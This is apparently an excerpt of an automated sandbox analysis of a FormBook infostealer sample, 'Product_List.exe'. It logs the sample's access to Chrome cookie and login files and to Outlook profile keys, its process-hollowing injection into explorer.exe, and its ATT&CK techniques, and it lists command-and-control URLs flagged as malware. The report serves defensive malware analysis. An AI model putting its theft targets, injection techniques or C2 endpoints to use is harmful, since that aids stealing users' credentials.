          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product_List.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Product_List.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.811143873.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.812010845.0000000000C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.810909300.0000000000780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620980229.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.620823205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception512
          Process Injection          		11
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		1
          Input Capture          		2
          Process Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth4
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common12
          Software Packing          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          File Deletion          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 870350 Sample: Product_List.exe Startdate: 19/05/2023 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic 2->36 38 Multi AV Scanner detection for domain / URL 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 6 other signatures 2->42 8 Product_List.exe 3 2->8         started        process3 file4 24 C:\Users\user\...\Product_List.exe.log, ASCII 8->24 dropped 11 Product_List.exe 8->11         started        14 Product_List.exe 8->14         started        process5 signatures6 52 Modifies the context of a thread in another process (thread injection) 11->52 54 Maps a DLL or memory area into another process 11->54 56 Sample uses process hollowing technique 11->56 58 Queues an APC in another process (thread injection) 11->58 16 explorer.exe 1 1 11->16 injected process7 dnsIp8 26 www.berlinhealthweek.com 130.185.109.77, 49697, 80 XIRRADE Germany 16->26 28 www.jhg61.com 150.129.40.9, 49707, 49708, 49709 TELECOM-HKHongKongTelecomGlobalDataCentreHK Hong Kong 16->28 30 6 other IPs or domains 16->30 34 System process connects to network (likely due to code injection or exploit) 16->34 20 cmd.exe 13 16->20         started        signatures9 process10 dnsIp11 32 www.jhg61.com 20->32 44 Tries to steal Mail credentials (via file / registry access) 20->44 46 Tries to harvest and steal browser information (history, passwords, etc) 20->46 48 Deletes itself after installation 20->48 50 2 other signatures 20->50 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Product_List.exe30%ReversingLabsWin32.Trojan.Pwsx
          Product_List.exe27%VirustotalBrowse
          Product_List.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.berlinhealthweek.com1%VirustotalBrowse
          www.gomarketing.info8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.fontbureau.comgrita0%URL Reputationsafe
          http://www.founder.com.cn/cnl-g0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov0%URL Reputationsafe
          http://www.jhg61.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmy100%Avira URL Cloudmalware
          http://rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf100%Avira URL Cloudmalware
          http://www.vns96.net/bpg5/www.vns96.netJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.founder.com.cn/cnD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.rt66omm.com0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.mysparexrewards.com100%Avira URL Cloudmalware
          http://www.carterandcone.comer0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ae0%Avira URL Cloudsafe
          http://www.techwithsun.com/bpg5/www.techwithsun.com100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/Y0/B0%Avira URL Cloudsafe
          http://www.perkibeans.com/bpg5/0%Avira URL Cloudsafe
          http://www.thetowerbells.com/bpg5/100%Avira URL Cloudmalware
          http://www.wearecatalyst.app/bpg5/100%Avira URL Cloudmalware
          http://www.haynicorpon.biz100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==100%Avira URL Cloudmalware
          http://www.gomarketing.info100%Avira URL Cloudmalware
          http://www.antalyabfe.com/bpg5/100%Avira URL Cloudmalware
          http://en.wikipfj0%Avira URL Cloudsafe
          http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.gomarketing.info/bpg5/100%Avira URL Cloudmalware
          http://www.perkibeans.com0%Avira URL Cloudsafe
          http://www.antalyabfe.com/bpg5/www.antalyabfe.comJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/he0%Avira URL Cloudsafe
          http://www.vns96.net0%Avira URL Cloudsafe
          http://www.bisarropainting.comAD0%Avira URL Cloudsafe
          http://www.berlinhealthweek.com/bpg5/100%Avira URL Cloudmalware
          http://www.founder.com.cn/cnto(l0%Avira URL Cloudsafe
          http://www.jhg61.com/bpg5/www.jhg61.comJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.jhg61.com0%Avira URL Cloudsafe
          http://www.haynicorpon.biz/bpg5/100%Avira URL Cloudmalware
          http://www.thetowerbells.com0%Avira URL Cloudsafe
          http://www.mysparexrewards.com/bpg5/100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/jp/Me0%Avira URL Cloudsafe
          http://www.42230.orgI0%Avira URL Cloudsafe
          http://www.fontbureau.comaSe0%Avira URL Cloudsafe
          http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.berlinhealthweek.com100%Avira URL Cloudmalware
          http://www.rt66omm.com/bpg5/100%Avira URL Cloudmalware
          http://www.perkibeans.com/bpg5/www.perkibeans.comJBfKk=_uLb4J-vJhW80%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/~e0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnsk0%Avira URL Cloudsafe
          http://www.bisarropainting.com0%Avira URL Cloudsafe
          http://www.techwithsun.com/bpg5/100%Avira URL Cloudmalware
          http://www.thetowerbells.com/bpg5/www.thetowerbells.comJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.gomarketing.info/bpg5/www.gomarketing.infoJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.fontbureau.comwe0%Avira URL Cloudsafe
          http://www.rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.musicandgros.com/bpg5/?8mBWmPn=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&JBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.musicandgros.com/bpg5/www.musicandgros.comJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.techwithsun.com100%Avira URL Cloudmalware
          http://www.antalyabfe.com0%Avira URL Cloudsafe
          http://www.jhg61.com/bpg5/100%Avira URL Cloudmalware
